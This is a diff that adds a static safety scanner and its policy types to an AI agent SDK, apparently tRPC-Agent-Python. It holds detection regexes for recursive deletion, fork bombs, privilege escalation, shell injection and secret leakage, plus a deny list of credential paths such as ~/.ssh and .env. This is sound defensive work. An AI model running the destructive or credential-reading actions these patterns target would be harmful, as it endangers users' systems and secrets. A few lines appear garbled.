b/trpc_agent_sdk/tools/safety/_scanner.py new file mode 100644 index 00000000..456b24ae --- /dev/null +++ b/trpc_agent_sdk/tools/safety/_scanner.py @@ -0,0 +1,499 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Static scanner for Python scripts and shell commands.""" + +from __future__ import annotations + +import ast +import fnmatch +import re +import shlex +import time +from pathlib import Path +from typing import Any +from urllib.parse import urlparse + +from ._rules import RULES +from ._types import RiskLevel +from ._types import SafetyDecision +from ._types import SafetyPolicy +from ._types import SafetyReport +from ._types import ScanFinding +from ._types import ScriptLanguage + +_SECRET_VALUE_RE = re.compile( + r"(?i)(api[_-]?key|token|password|secret|private[_-]?key)\s*[:=]\s*['\"]?([A-Za-z0-9_./+=:-]{8,})" +) +_PRIVATE_KEY_RE = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----") +_URL_RE = re.compile(r"https?://[^\s'\"<>]+") +_DANGEROUS_DELETE_RE = re.compile( + r"(?i)\b(rm\s+-[^\n;|&]*[rf]|del\s+/[fq]|rmdir\s+/s)\b") +_FORK_BOMB_RE = re.compile(r":\(\)\s*\{\s*:\|:\s*&\s*\}\s*;?\s*:") +_LONG_SLEEP_RE = re.compile(r"(?i)\b(?:sleep|timeout)\s+([0-9]{3,})\b") +_DEPENDENCY_RE = re.compile( + r"(?i)\b(?:pip|pip3|python\s+-m\s+pip|npm|yarn|pnpm|apt|apt-get)\s+install\b" +) +_PRIVILEGE_RE = re.compile(r"(?i)(?:^|[;&|]\s*)(?:sudo|su)\b|\bchmod\s+777\b") +_SHELL_META_RE = re.compile(r"`[^`]+`|\$\([^)]+\)") +_SENSITIVE_OUTPUT_RE = re.compile( + r"(?i)\b(print|echo|logger|logging\.\w+|write|requests\.\w+|curl)\b.*" + r"\b(api[_-]?key|token|password|secret|private[_-]?key)\b") + + +class SafetyScanner: + """Static scanner for tool-provided scripts and commands.""" + def __init__(self, policy: SafetyPolicy | None = None): + self.policy = policy or SafetyPolicy() + + def scan( + self, + *, + content: str, + language: str | ScriptLanguage = ScriptLanguage.UNKNOWN, + tool_name: str = "", + cwd: str = "", + env: dict[str, Any] | None = None, + metadata: dict[str, Any] | None = None, + ) -> SafetyReport: + """Scan script or command content.""" + start = time.perf_counter() + lang = self._normalize_language(language, content) + findings: list[ScanFinding] = [] + redacted = False + error_message = None + + try: + findings.extend(self._scan_common(content)) + if lang == ScriptLanguage.PYTHON: + findings.extend(self._scan_python(content)) + elif lang == ScriptLanguage.BASH: + findings.extend(self._scan_shell(content)) + + if cwd: + findings.extend(self._scan_paths(cwd, "cwd")) + if env: + findings.extend(self._scan_env(env)) + if metadata: + findings.extend(self._scan_metadata(metadata)) + except Exception as ex: # pylint: disable=broad-except + error_message = str(ex) + findings.append(self._finding("SCANNER_ERROR", str(ex))) + + if any(" ScriptLanguage: + value = language.value if isinstance( + language, ScriptLanguage) else (language or "") + lowered = value.lower() + if lowered in ("python", "py", "python3"): + return ScriptLanguage.PYTHON + if lowered in ("bash", "sh", "shell"): + return ScriptLanguage.BASH + stripped = content.lstrip() + if stripped.startswith( + ("import ", "from ", "def ", "print(", "async def ")): + return ScriptLanguage.PYTHON + return ScriptLanguage.BASH if self._looks_like_shell( + content) else ScriptLanguage.UNKNOWN + + def _looks_like_shell(self, content: str) -> bool: + return bool( + re.search( + r"(^|\s)(curl|wget|rm|cat|grep|pip|npm|apt|sudo|bash|sh)\b", + content)) + + def _scan_common(self, content: str) -> list[ScanFinding]: + findings: list[ScanFinding] = [] + findings.extend(self._scan_paths(content, "content")) + + if _PRIVATE_KEY_RE.search(content): + findings.append( + self._finding("SENSITIVE_OUTPUT", "")) + + for match in _SECRET_VALUE_RE.finditer(content): + findings.append( + self._finding("SENSITIVE_OUTPUT", + f"{match.group(1)}=")) + + if _SENSITIVE_OUTPUT_RE.search(content): + evidence = self._redact( + self._line_for_match(content, + _SENSITIVE_OUTPUT_RE.search(content))) + findings.append(self._finding("SENSITIVE_OUTPUT", evidence)) + + for match in _URL_RE.finditer(content): + url = match.group(0) + host = urlparse(url).hostname or "" + if host and not self._is_domain_allowed(host): + findings.append(self._finding("NET_NON_WHITELIST_EGRESS", url)) + + if _FORK_BOMB_RE.search(content): + findings.append( + self._finding("RESOURCE_FORK_BOMB", + _FORK_BOMB_RE.search(content).group(0))) + + if _DEPENDENCY_RE.search(content): + findings.append( + self._finding( + "DEPENDENCY_INSTALL", + self._line_for_match(content, + _DEPENDENCY_RE.search(content)))) + + return findings + + def _scan_paths(self, text: str, source: str) -> list[ScanFinding]: + findings: list[ScanFinding] = [] + normalized = text.replace("\\", "/") + for raw_path in self.policy.denied_paths: + path = raw_path.replace("\\", "/") + candidates = { + path, str(Path(path).expanduser()).replace("\\", "/") + } + for candidate in candidates: + if candidate and (candidate in normalized or fnmatch.fnmatch( + normalized, f"*{candidate}*")): + rule_id = "FILE_SECRET_READ" if self._is_secret_path( + candidate) else "FILE_SYSTEM_PATH_WRITE" + findings.append( + self._finding(rule_id, f"{source}: {raw_path}")) + break + return findings + + def _scan_env(self, env: dict[str, Any]) -> list[ScanFinding]: + findings: list[ScanFinding] = [] + for key, value in env.items(): + if re.search( + r"(?i)(api[_-]?key|token|password|secret|private[_-]?key)", + str(key)): + findings.append( + self._finding("SENSITIVE_OUTPUT", + f"env.{key}=")) + elif isinstance(value, str) and (_SECRET_VALUE_RE.search(value) + or _PRIVATE_KEY_RE.search(value)): + findings.append( + self._finding("SENSITIVE_OUTPUT", + f"env.{key}=")) + return findings + + def _scan_metadata(self, metadata: dict[str, Any]) -> list[ScanFinding]: + findings: list[ScanFinding] = [] + timeout = self._number_from( + metadata, ("timeout", "timeout_seconds", "max_timeout_seconds")) + if timeout is not None and timeout > self.policy.max_timeout_seconds: + findings.append( + self._finding("RESOURCE_LONG_SLEEP", f"timeout={timeout}")) + + output_limit = self._number_from( + metadata, ("max_output_bytes", "max_output_size", "output_limit")) + if output_limit is not None and output_limit > self.policy.max_output_bytes: + findings.append( + self._finding("RESOURCE_OUTPUT_LIMIT", + f"max_output_bytes={output_limit}")) + return findings + + def _scan_python(self, content: str) -> list[ScanFinding]: + findings: list[ScanFinding] = [] + try: + tree = ast.parse(content) + except SyntaxError: + return findings + self._scan_shell(content) + + import_names: set[str] = set() + for node in ast.walk(tree): + if isinstance(node, ast.Import): + import_names.update( + alias.name.split(".")[0] for alias in node.names) + elif isinstance(node, ast.ImportFrom) and node.module: + import_names.add(node.module.split(".")[0]) + + if isinstance(node, ast.Call): + call_name = self._call_name(node.func) + if call_name in {"os.system", "os.popen"}: + findings.append( + self._finding("PROC_OS_SYSTEM", + self._node_evidence(content, node), + node)) + elif call_name.startswith("subprocess."): + rule_id = "PROC_OS_SYSTEM" if self._has_shell_true( + node) else "PROC_SUBPROCESS" + findings.append( + self._finding(rule_id, + self._node_evidence(content, node), + node)) + elif call_name in {"shutil.rmtree"}: + findings.append( + self._finding("FILE_RECURSIVE_DELETE", + self._node_evidence(content, node), + node)) + elif call_name in {"open", "Path.open", "pathlib.Path.open"}: + arg_text = self._first_string_arg(node) + if arg_text: + findings.extend( + self._scan_paths(arg_text, "python.open")) + elif call_name in { + "requests.get", "requests.post", "requests.put", + "requests.delete", "aiohttp.ClientSession" + }: + url = self._first_string_arg(node) + if url: + host = urlparse(url).hostname or "" + if host and not self._is_domain_allowed(host): + findings.append( + self._finding("NET_NON_WHITELIST_EGRESS", url, + node)) + else: + findings.append( + self._finding("NET_CLIENT_USAGE", + self._node_evidence(content, node), + node)) + elif call_name in { + "socket.socket", "socket.create_connection" + }: + findings.append( + self._finding("NET_CLIENT_USAGE", + self._node_evidence(content, node), + node)) + elif call_name in {"time.sleep", "sleep"}: + if (node.args and isinstance(node.args[0], ast.Constant) + and isinstance(node.args[0].value, (int, float))): + if node.args[ + 0].value >= self.policy.max_timeout_seconds: + findings.append( + self._finding( + "RESOURCE_LONG_SLEEP", + self._node_evidence(content, node), node)) + + if isinstance(node, ast.While) and isinstance( + node.test, ast.Constant) and node.test.value is True: + findings.append( + self._finding("RESOURCE_INFINITE_LOOP", + self._node_evidence(content, node), node)) + + if {"requests", "aiohttp", "socket"} & import_names and not any( + f.rule_id.startswith("NET_") for f in findings): + findings.append( + self._finding("NET_CLIENT_USAGE", "network client import")) + return findings + + def _scan_shell(self, content: str) -> list[ScanFinding]: + findings: list[ScanFinding] = [] + + if _DANGEROUS_DELETE_RE.search(content): + findings.append( + self._finding( + "FILE_RECURSIVE_DELETE", + self._line_for_match( + content, _DANGEROUS_DELETE_RE.search(content)))) + if _LONG_SLEEP_RE.search(content): + findings.append( + self._finding( + "RESOURCE_LONG_SLEEP", + self._line_for_match(content, + _LONG_SLEEP_RE.search(content)))) + if _PRIVILEGE_RE.search(content): + findings.append( + self._finding( + "PRIVILEGE_ESCALATION", + self._line_for_match(content, + _PRIVILEGE_RE.search(content)))) + if _SHELL_META_RE.search(content): + findings.append( + self._finding( + "SHELL_INJECTION", + self._line_for_match(content, + _SHELL_META_RE.search(content)))) + if re.search(r"(^|[^|])\|([^|]|$)", content): + findings.append( + self._finding("SHELL_PIPELINE", + self._first_line_with(content, "|"))) + if re.search(r"(?:^|[^&])&(?!&)", content): + findings.append( + self._finding("SHELL_BACKGROUND", + self._first_line_with(content, "&"))) + + command = self._first_command(content) + if command and self.policy.allowed_commands and command not in self.policy.allowed_commands: + findings.append(self._finding("COMMAND_NOT_ALLOWED", command)) + + if re.search(r"(?i)\b(curl|wget)\b", + content) and not _URL_RE.search(content): + findings.append( + self._finding( + "NET_CLIENT_USAGE", + self._first_line_with(content, "curl") + or self._first_line_with(content, "wget"))) + + return findings + + def _first_command(self, content: str) -> str: + stripped = content.strip() + if not stripped: + return "" + try: + tokens = shlex.split(stripped, comments=True, posix=True) + except ValueError: + tokens = stripped.split() + if not tokens: + return "" + if tokens[0] in { + "python", "python3" + } and len(tokens) >= 4 and tokens[1:3] == ["-m", "pip"]: + return "pip" + return Path(tokens[0]).name + + def _number_from(self, data: dict[str, Any], + keys: tuple[str, ...]) -> float | None: + for key in keys: + value = data.get(key) + if isinstance(value, (int, float)): + return float(value) + if isinstance(value, str): + try: + return float(value) + except ValueError: + continue + return None + + def _is_secret_path(self, path: str) -> bool: + return bool( + re.search( + r"(?i)(\.ssh|\.env|credential|secret|token|password|private[_-]?key)", + path)) + + def _is_domain_allowed(self, host: str) -> bool: + host = host.lower().rstrip(".") + for pattern in self.policy.allowed_domains: + candidate = pattern.lower().rstrip(".") + if candidate.startswith("*.") and host.endswith(candidate[1:]): + return True + if host == candidate: + return True + return False + + def _call_name(self, node: ast.AST) -> str: + if isinstance(node, ast.Name): + return node.id + if isinstance(node, ast.Attribute): + parent = self._call_name(node.value) + return f"{parent}.{node.attr}" if parent else node.attr + return "" + + def _has_shell_true(self, node: ast.Call) -> bool: + return any( + keyword.arg == "shell" and isinstance(keyword.value, ast.Constant) + and keyword.value.value is True for keyword in node.keywords) + + def _first_string_arg(self, node: ast.Call) -> str: + if not node.args: + return "" + value = node.args[0] + if isinstance(value, ast.Constant) and isinstance(value.value, str): + return value.value + return "" + + def _node_evidence(self, content: str, node: ast.AST) -> str: + segment = ast.get_source_segment(content, node) or "" + return self._redact(segment[:200]) + + def _line_for_match(self, content: str, + match: re.Match[str] | None) -> str: + if not match: + return "" + start = content.rfind("\n", 0, match.start()) + 1 + end = content.find("\n", match.end()) + if end == -1: + end = len(content) + return self._redact(content[start:end][:200]) + + def _first_line_with(self, content: str, needle: str) -> str: + for line in content.splitlines() or [content]: + if needle in line: + return self._redact(line[:200]) + return "" + + def _redact(self, text: str) -> str: + text = _PRIVATE_KEY_RE.sub("", text) + return _SECRET_VALUE_RE.sub( + lambda m: f"{m.group(1)}=", text) + + def _finding(self, + rule_id: str, + evidence: str, + node: ast.AST | None = None) -> ScanFinding: + rule = RULES[rule_id] + override = self.policy.rules.get(rule_id) + decision = override.decision if override and override.decision else rule.decision + risk_level = override.risk_level if override and override.risk_level else rule.risk_level + return ScanFinding( + rule_id=rule_id, + risk_type=rule.risk_type, + risk_level=risk_level, + decision=decision, + message=rule.message, + evidence=self._redact(evidence or rule.message), + recommendation=rule.recommendation, + line=getattr(node, "lineno", None), + column=getattr(node, "col_offset", None), + ) + + def _decide(self, findings: list[ScanFinding]) -> SafetyDecision: + enabled = [ + finding for finding in findings + if self._rule_enabled(finding.rule_id) + ] + if not enabled: + return SafetyDecision.ALLOW + if any(f.decision == SafetyDecision.DENY for f in enabled): + return SafetyDecision.DENY + if self.policy.fail_closed and any( + f.risk_level in {RiskLevel.HIGH, RiskLevel.CRITICAL} + for f in enabled): + return SafetyDecision.DENY + if any(f.decision == SafetyDecision.NEEDS_HUMAN_REVIEW + for f in enabled): + return SafetyDecision.NEEDS_HUMAN_REVIEW + return SafetyDecision.ALLOW + + def _max_risk(self, findings: list[ScanFinding]) -> RiskLevel: + order = { + RiskLevel.LOW: 0, + RiskLevel.MEDIUM: 1, + RiskLevel.HIGH: 2, + RiskLevel.CRITICAL: 3, + } + enabled = [ + finding for finding in findings + if self._rule_enabled(finding.rule_id) + ] + if not enabled: + return RiskLevel.LOW + return max((finding.risk_level for finding in enabled), + key=lambda level: order[level]) + + def _rule_enabled(self, rule_id: str) -> bool: + override = self.policy.rules.get(rule_id) + return True if override is None else override.enabled diff --git a/trpc_agent_sdk/tools/safety/_types.py b/trpc_agent_sdk/tools/safety/_types.py new file mode 100644 index 00000000..ce2e5734 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/_types.py @@ -0,0 +1,127 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Types for tool script safety scanning.""" + +from __future__ import annotations + +from enum import Enum +from typing import Any +from typing import Optional + +from pydantic import BaseModel +from pydantic import Field + + +class SafetyDecision(str, Enum): + """Final or per-rule safety decision.""" + + ALLOW = "allow" + DENY = "deny" + NEEDS_HUMAN_REVIEW = "needs_human_review" + + +class RiskLevel(str, Enum): + """Finding severity.""" + + LOW = "low" + MEDIUM = "medium" + HIGH = "high" + CRITICAL = "critical" + + +class RiskType(str, Enum): + """Safety risk category.""" + + FILE_OPERATION = "file_operation" + NETWORK_EGRESS = "network_egress" + PROCESS_EXECUTION = "process_execution" + DEPENDENCY_INSTALL = "dependency_install" + RESOURCE_ABUSE = "resource_abuse" + SENSITIVE_LEAK = "sensitive_leak" + POLICY = "policy" + UNKNOWN = "unknown" + + +class ScriptLanguage(str, Enum): + """Supported script language hints.""" + + PYTHON = "python" + BASH = "bash" + UNKNOWN = "unknown" + + +class RuleOverride(BaseModel): + """Policy override for a built-in rule.""" + + enabled: bool = True + decision: Optional[SafetyDecision] = None + risk_level: Optional[RiskLevel] = None + + +class SafetyPolicy(BaseModel): + """Configurable safety policy.""" + + mode: str = "standard" + fail_closed: bool = False + block_on_review: bool = True + allowed_domains: list[str] = Field(default_factory=list) + allowed_commands: list[str] = Field(default_factory=list) + denied_paths: list[str] = Field( + default_factory=lambda: ["~/.ssh", ".env", "/etc", "/var/secrets"]) + max_timeout_seconds: int = 300 + max_output_bytes: int = 10_000 + audit_log_path: Optional[str] = "tool_safety_audit.jsonl" + rules: dict[str, RuleOverride] = Field(default_factory=dict) + + +class ScanFinding(BaseModel): + """A single safety rule hit.""" + + rule_id: str + risk_type: RiskType + risk_level: RiskLevel + decision: SafetyDecision + message: str + evidence: str + recommendation: str + line: Optional[int] = None + column: Optional[int] = None + + +class SafetyReport(BaseModel): + """Structured safety scan result.""" + + decision: SafetyDecision + risk_level: RiskLevel = RiskLevel.LOW + findings: list[ScanFinding] = Field(default_factory=list) + elapsed_ms: float = 0 + redacted: bool = False + blocked: bool = False + language: ScriptLanguage = ScriptLanguage.UNKNOWN + tool_name: str = "" + scanner_version: str = "1" + error: Optional[str] = None + + @property + def rule_ids(self) -> list[str]: + """Return matched rule ids in report order.""" + return [finding.rule_id for finding in self.findings] + + +class SafetyAuditEvent(BaseModel): + """JSONL audit event emitted by the safety guard.""" + + timestamp: str + tool_name: str + decision: SafetyDecision + risk_level: RiskLevel + rule_ids: list[str] = Field(default_factory=list) + elapsed_ms: float = 0 + redacted: bool = False + blocked: bool = False + language: ScriptLanguage = ScriptLanguage.UNKNOWN + cwd: str = "" + metadata: dict[str, Any] = Field(default_factory=dict)